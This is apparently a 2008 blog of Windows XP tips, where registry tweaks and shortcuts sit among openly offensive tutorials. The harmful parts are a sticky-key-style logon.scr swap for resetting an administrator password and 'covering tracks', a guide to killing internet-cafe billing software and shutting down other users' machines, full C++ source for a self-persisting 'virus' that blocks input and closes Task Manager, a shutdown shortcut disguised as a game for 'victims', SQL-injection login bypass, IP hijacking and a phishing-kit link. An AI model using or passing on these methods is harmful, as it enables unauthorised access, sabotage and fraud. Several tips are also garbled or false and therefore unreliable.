111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update Launches - wupdmgr
115. Windows Version - winver
116. Windows XP Tour Wizard - tourstart
117. Wordpad - write

Tuesday, March 25, 2008

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speeding Up Share Viewing

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Automatically Kill Programs At Shutdown

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Increasing options in add/remove programs

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Menu Delays

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

No Shutdown

Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Automatic Administrator Login

Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

Display legal notice on startup

Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user ricky blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Sunday, March 23, 2008

Speed up Mozilla Firefox about 3-30x Faster

If your a firefox lover like me then you should try this.

1. Type "about:config" into the address bar and hit return. Scroll
down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This
means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it recieves.

If you're using a broadband connection you'll load pages 2-30 times faster now.

ip locator .......find the location of a ip

this is a software to find the location of the ip

link:
http://www.4shared.com/file/25808579/5856eca5/iplocator.html

Watch Any Movie In Paint (100%) Working

* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint

*you can edit it also

Hack [Sify,Reliance,Others] Speed Upto 10 MBPS [Beam Cable Hack]

First Download this ETHERNET Ip Sniffer called ETHERDETECT

Use the tool to Scan Ip's in your network

Keep Scanning till you get some 200 Ip's ..

Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!
NOTE:Please save your Ip address somewhere so as to get back to your original ip !

It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.

Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip


..:~Download Link~:..
CODE
http://rapidshare.com/files/46070425/EtherDetect_setup.exe


..:~SERIAL~:..
CODE
YW38X6HKWYT4CTK

C-C++ projects with source codes

http://w14.easy-share.com/4282431.html

make a fake page of ur own for any website

hey friends now make ur own fake page for any web site in just a min. check out this software


http://rapidshare.com/files/86508209/Fishi...y_DaveDaDon.exe

How To Shut Down All Pc(s) On the Network

Right click my computer, choose manage (computer management opens).In the left column it says Computer Management (local)
Right click it and choose: Connect to another computer
Select your computer you wish to shut down
Right click (where it used to say computer managment (local)....Then you get the computer information Goto the advanced tab and at the bottom choose Startup and Recovery and click the (mighty) shutdown button.its the super mighty Shut button by Faraz i guess(JK).LOL


or


if that aint work try looking at this Video
Quote

Usage:

SHUTDOWN [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d upx:yy]


-i Display GUI interface, must be the first option

-l Log off (cannot be used with -m option)

-s Shutdown the computer

-r Shutdown and restart the computer

-a Abort a system shutdown

-m \\computername Remote computer to shutdown/restart/abort

-t xx Set timeout for shutdown to xx seconds

-c "comment" Shutdown comment (maximum of 127 characters)

-f Forces running applications to close without warning

-d [p]x:yy The reason code for the shutdown
u is the user code
p is a planned shutdown code
xx is the major reason code (positive integer less than 256)
yy is the minor reason code (positive integer less than 65536)

Start Your Computer in a Second

Does Your comp take a hell lot of time to start??Well, if the Answer is Yes then this is gonna really help you.Here I Will Tell You How To Speed Up Your Boot Process of Windows Xp.

1.Open Notepad and then copy/paste the following code in it :
Quote
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]
EnablePrefetcher=dword:00000003
2.Then save the notepad file with any name but make sure to rename its extension .REG , Finally double click on the file and then click Yes .

chat with command prompt

If you want personal chat with a friend
you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!

Hacking internet Cafe

Basic overview of this tutorial is if there's some kind of timer or client
software on the computer you're using at the Net Cafe you can hopefully disable it.

Firstly we need to gain access to command prompt (cmd.exe) to do this there's a few
ways.

1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.
Say that's disabled then we can try some other methods.

2) Press the Windows Logo + R and it will start run up. (hopefully)

3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.

4) Open notepad type "cmd.exe" without the quotation marks ("") and then
go to File/Save As.. and type the name for the file and have it end with
.bat for example "MyNewFile.bat" and select Save as type and select All Files.

Make sure to save it somewhere you can access it, Like the desktop.

If they have deleted Notepad then go in to Internet Explorer and right click
and select View Source or on the menu bar click View then source and perform the
same process as above.

Once you have done this you can run the file. If you can't open files from the desktop
then go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate to
the Desktop and it will show the saves files on the desktop in a folder type window.


Once you have access to command prompt you can perform some usefull actions e.g shutdown
programs, shutdown other peoples computers, add new accounts.

Ok, well most Net cafes have software running that boots you off of the machine after a certain
ammount of time unless you pay for more time. Well, we don't want that to happen now do we?

Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.



For more info on the software running we can use the command "tasklist" inside of command prompt.

example: "tasklist" (without quotation marks)

Basicly it brings up all the processes running.


Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?
we use "taskkill" >:]

Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown in
the task list like that we would do this.

example: "taskkill /im Timer.exe /f"

/im : is for image name. Not quite sure what it means, but we need it.

Timer.exe : that's the Net cafes software/process name (example)

/f : Forcefully shuts the program.


Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.

If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.



Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for you
to do with command prompt.

Find the people on the network with "net view" and it will list the other computers names on the network.

The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes in
handy)

example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"

use "shutdown -a" to cancel this action so you don't shut your own computer down.

-s : sets the shutdown action.

-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find out
how to find computer names use net view. It will list the other computer names.)

-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.

-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)

-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doing
it to someone else.

Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.

In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.

PS This wasn't written by me. I'm just sharing it. All due credit goes to the original poster.

Virus, Create a new fake virus to spoof Antivirus

open notepad


write this
Quote
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

save it

right click and scan it with your antivirus


Amazed?? huh

Virus made in c++

its a boot virus

#include
#include
#include
#include
#include
#include
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}

void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

Sleep(10);
}
}

To make folder delete protected

1)Right click on the folder
2)Then in the general tab click advanced (near read only option)
3)In that click encrypt contents to secure data.
4)This can happen if u run windows Xp and you have Ntfs file system on that particular drive and an administrative account.

Its Workin ..!!

Shutdown someones comp over msn and all

Ok this is a........ Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim̢۪s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"


You can change "this is a virus" to anything you would like that̢۪s just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game. Depends on the victim̢۪s age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don̢۪t forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone you...... dislike greatly.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL
Ok go to start, run, type cmd, then in cmd type: shutdown -a

Free Access To Websites Without Registering

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.

School/cllg server hacking......hack ur school server

First Download this ETHERNET Ip Sniffer called ETHERDETECT

Use the tool to Scan Ip's in your network

Keep Scanning till you get some 200 Ip's ..

Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!
NOTE:Please save your Ip address somewhere so as to get back to your original ip !

It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.

Sometimes when you will change your Ip you will get same speed ...in that case ..try another IP !


I'v tried this with Reliance getting speed upto 4mbps though my plan is of 600kbps




..:~Download Link~:..
CODE
http://rapidshare.com/files/46070425/EtherDetect_setup.exe


..:~SERIAL~:..
CODE
YW38X6HKWYT4CTK

SEARCH files in RAPIDSHARE.com

go to
http://filesbot.com
If you want a password for the files that you download
I have tip
for exemple you search a password for this link:http://rapidshare.com/files/33432765/forexemple.rar
copy only (33432765/forexemple.rar) or (33432765/forexemple.rar+pass) than paste in google you will see many things about the link one of them is the password

Hacking Websites

If you posses the HTML & JAVA knowledge then u can even access password protected websites.

To hack a Password Protected Websites just follow these steps: -

* Open the website u want to hack. Provide wrong username-password.
(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
your work starts from here...

* Right click anywhere on that page =>> go to view source.

* There u can see the html coding with java scripts.

* Before this login information copy the url
of the site in which you are.


* Then delete the java script from the above that validates your
information in the server.(Do this very carefully, your success to
hack the site depends upon this i.e. how efficiently u delete the
JavaScript’s that validate your account information)



then look for...code ..: input name="password" type="password"
=> replace
there instead of . See there if
max length of password is less than 11 then increase it to 11
(e.g. : if then write

* Just go to file => save as and save it any where within
the hard disk with ext.html(e.g. :c:hack.htm)

* Close your webpage and go to the webpage u save in your
hard disk(e.g : c:hack.htm) Open it.

* U see that some changes in current page as compared to original
One. Don't worry.

* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats! Your have cracked the above website and entered into the
account of Ist user saved in the server's database.

The above trick doesn't work on the websites using latest
technique to protect there servers.

How to change ur IP on networks

The following is a guide on how to change your IP in a minute. This can
be used if your IP has been banned from a game server, or on gunbound
if your IP get's blocked. I've tried this on both Windows XP and Windows
2000, and it has worked:

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit okay

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your
desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area
Connection", or something close to that, and, if you have a network hooked up,
all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under
the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1
and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask"
section with default numbers.
13. Hit the "okay" button here
14. Hit the "okay" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties
again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
18. Hit "okay"
19. Hit "okay" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 30
seconds.

*Note* This only changes your dynamic IP address, not your ISP/IP
address. If you plan on hacking a website with this trick be extremely
careful, because if they try a little, they can trace it back.

How to Hide the drives(c:,d:,e:,...etc)

1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your Computer.
So, now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your Computer.You can now see all the drives again. Magic.......

Best Way To Lock Your Folder Without Any Programs

1- make a new folder ( name it as you like )

2- inside this folder make a ( TXT ) file & copy inside it this:

Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End 3- after u copy the Commanding go to line ( 23 ) u will find this word : password here (Change it with ) any password u like.

4- After that make ‘save as’ & name as (locker.bat )

5- Now back to the folder & u will find a ( LOCKER ) commanding.

6- Click on it & u will find a new folder (Private )

7- Ok ,, now copy what u want in it & after that go to ( locker ) by click on it , it will open and ask you want lock your folder? Y/N ?

8- Type Y

9- If you want UNLOCK your folder ,go to (locker) & type your pass and you will see your private folder.

Blog Archive

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Blogger Templates